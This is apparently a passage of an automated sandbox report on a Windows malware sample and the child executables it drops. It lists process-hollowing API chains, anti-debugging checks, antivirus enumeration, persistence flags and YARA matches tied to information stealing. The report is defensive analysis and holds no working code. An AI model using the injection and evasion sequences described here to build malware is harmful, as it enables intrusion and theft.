Source: R5391762lf.exe, 00000002.00000002.1397540119.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000003.1391033574.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397540119.0000000000638000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\R5391762lf.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\R5391762lf.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_0040A3A4 IsDebuggerPresent, 0_2_0040A3A4
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 2_2_0042A57A
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_044980A3 push dword ptr fs:[00000030h] 0_2_044980A3
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_05EA0042 push dword ptr fs:[00000030h] 0_2_05EA0042
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 5_2_044560A3 push dword ptr fs:[00000030h] 5_2_044560A3
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 5_2_05DB0042 push dword ptr fs:[00000030h] 5_2_05DB0042
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Code function: 6_2_045780A3 push dword ptr fs:[00000030h] 6_2_045780A3
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Code function: 6_2_05EC0042 push dword ptr fs:[00000030h] 6_2_05EC0042
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_00405A52 GetProcessHeap, 0_2_00405A52
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_0040A32F SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040A32F
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_004329EC
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_004329BB SetUnhandledExceptionFilter, 2_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_05EA0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 0_2_05EA0110
Source: C:\Users\user\Desktop\R5391762lf.exe Memory written: C:\Users\user\Desktop\R5391762lf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\R5391762lf.exe Memory written: C:\Users\user\Desktop\R5391762lf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Memory written: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Memory written: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Memory written: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Memory written: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Memory written: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe"
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe --Task
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_05EC80F6 cpuid 0_2_05EC80F6
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_05ED3F87
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 0_2_05ED49EA
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 0_2_05ED394D
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 0_2_05ECC8B7
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_05EE0AB6
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 2_2_0043404A
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 2_2_00438178
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 2_2_00440116
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_004382A2
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 2_2_0043834F
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 2_2_00438423
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: EnumSystemLocalesW, 2_2_004387C8
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: GetLocaleInfoW, 2_2_0043884E
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 2_2_00432B6D
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 2_2_00432FAD
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 2_2_004335E7
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW, 2_2_00437BB3
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: EnumSystemLocalesW, 2_2_00437E27
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 2_2_00437E83
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 2_2_00437F00
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free, 2_2_0042BF17
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 2_2_00437F83
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 5_2_05DE3F87
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 5_2_05DE49EA
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 5_2_05DE394D
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 5_2_05DDC8B7
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 5_2_05DF0AB6
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 6_2_05EF3F87
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 6_2_05EF49EA
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 6_2_05EF394D
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 6_2_05EEC8B7
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 6_2_05F00AB6
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_00409DFB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00409DFB
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 2_2_0042FE47
Source: C:\Users\user\Desktop\R5391762lf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 9.2.build2.exe.1ba15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.build2.exe.1ba15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1502638549.0000000001BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1672621226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
